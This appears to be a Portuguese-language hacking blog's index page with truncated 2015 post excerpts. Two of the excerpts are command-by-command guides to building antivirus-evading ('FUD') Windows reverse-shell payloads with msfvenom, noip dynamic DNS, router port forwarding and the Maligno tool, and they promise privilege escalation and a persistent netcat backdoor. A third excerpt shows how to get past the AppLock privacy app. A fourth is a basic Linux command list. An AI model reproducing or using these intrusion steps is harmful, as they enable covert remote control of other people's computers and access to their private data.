Pular para o conteúdo principal

Postagens

Mostrando postagens de 2015

[100% FUD] Exploit Reverse Dns, bypassAV, ShellCode, Hack Windows 10

Video   Instalando NOIP no Debian Link DROP: http://adf.ly/1TNc5t LInk NOIP: http://adf.ly/1TNgHZ # tar -xf noip-duc-linux.tar.gz # cd noip-2.1.9.1 # cp binaries/noip2-$(uname -m) noip2 # make install -- ENTER YOUR EMAIL: -- ENTER YOUR PASS: -- Update Interval: [30] 5 -- Run Update [N] (y/n) n Download do Script Running noip2.sh Link DROP: http://adf.ly/1TNcCQ # chmod+x noip2 # ./noip2 start Abrindo Porta  no moden Telsec (OI Velox) Nav: 192.168.1.1 -- ENTER YOUR USER -- ENTER YOUR PASS -> Services -> NAT/NAPT -> Virtual Server : -- User-defined Service Name:  INSIRA O NOME -- WAN Interface: SELECIONE any -- WAN Port: ENTER com sua porta -- LAN Open Port: ENTER com sua porta -- LAN Ip Address: ENTER com seu ip local Criando a ShellScript.py (Exploit Code) # nano shellscript.py Faça download do Arquivo aqui: http://adf.ly/1Y2pEb Criando Exploit Code (msfvenom, windows reverse dns) # msfvenom -p windows/meterpreter/rev...

[FUD 100%] Exploit Maligno, bypass AV, Privilege Escalation, Persistent Netcat Backdoor

Video: Comandos: - Configurando Maligno Primeiro faça o donwload do Maligno aqui: http://adf.ly/1Szd6C $_ mv maligno-2.4 maligno $_ chmod 777 maligno -R $_ cd maligno $_ sh install.sh      + Country Name -> ENTER      + State Name -> ENTER      + Locality Name -> ENTER      + Organozation Name -> ENTER      + Common Name -> ENTER      + Email Address -> ENTER $_ nano server_config.xml $_ python clientgen.py -f server_config.xml -s true $_ python maligno_srv.py - Iniciar o postgresql  $_ /etc/init.d/postgresql start - Iniciar o msfconsole mais o resource.rc $_ msfconsole -r ~/maligno/msfresources/0_standard_reverse_http_MY_IP_Port.rc -q - Copiando o cliente.py para a compilação para exe $_ cd maligno/clients $_ cp standalone_0_standard_windows_reverse_http.py ~/PASTA_DESTINO/ virus...

Burlando o AppLock

Bom Pessoal vamos aprender a burla o AppLock Download AppLock O que o applock faz, um breve resumo retirado da googleplay App Bloqueio pode bloquear mensagens SMS, contatos, Gmail, Facebook, Whatapp, galeria de fotos, Market, configurações, chamadas e qualquer aplicativo que for necessário com grande variedade de opções, protegendo sua privacidade. As fotos selecionadas desaparecem da sua galeria de fotos e ficam bloqueadas por um teclado PIN fácil de usar. Com AppLock, só você poderá ver as suas fotos ocultas. Privacidade sem dificuldade! MAIS. Link Porém ah uma falha em tudo isso, vou mostrar o passo a passo de como podemos burlar o app e acessar tudo q foi protegido pelo app. 1- Para burlar o AppLock você deve ir para as configurações e logo depois em aplicativos, como mostra a imagem abaixo. 2- Procure por AppLock, clique em cima e depois em forçar parada, como mostra a imagem abaixo. Pronto agora você pode acessar os arquivos, imagens apps bloqueado pelo apploc...

Comando Básico Linux

  mkdir – make directories Usage: mkdir [OPTION] DIRECTORY… :~# mkdir lhn ls – list directory contents Usage: ls [OPTION]… [FILE]… :~# ls, ls ­l, ls lhn cd – changes directories Usage: cd [DIRECTORY] :~# cd lhn pwd ­-  print name of current working directory Usage: pwd vim – Vi Improved, a programmers text editor Usage: vim [OPTION] [file]… :~# vim lhn.txt cp – copy files and directories Usage: cp [OPTION]… SOURCE DEST :~# cp sample.txt sample_copy.txt cp sample_copy.txt target_dir mv – move (rename) files Usage: mv [OPTION]… SOURCE DEST :~# mv source.txt target_dir mv old.txt new.txt rm ­ remove files or directories Usage: rm [OPTION]… FILE… :~# rm file1.txt , rm ­rf some_dir find – search for files in a directory hierarchy Usage: find [OPTION] [path] [pattern] :~# find file1.txt, find ­name file1.txt history – prints recently used commands Usage: history cat – concatenate files and print on the standard output Usage: cat [OPTION] [FILE]… :~# cat file1.txt file2.txt c...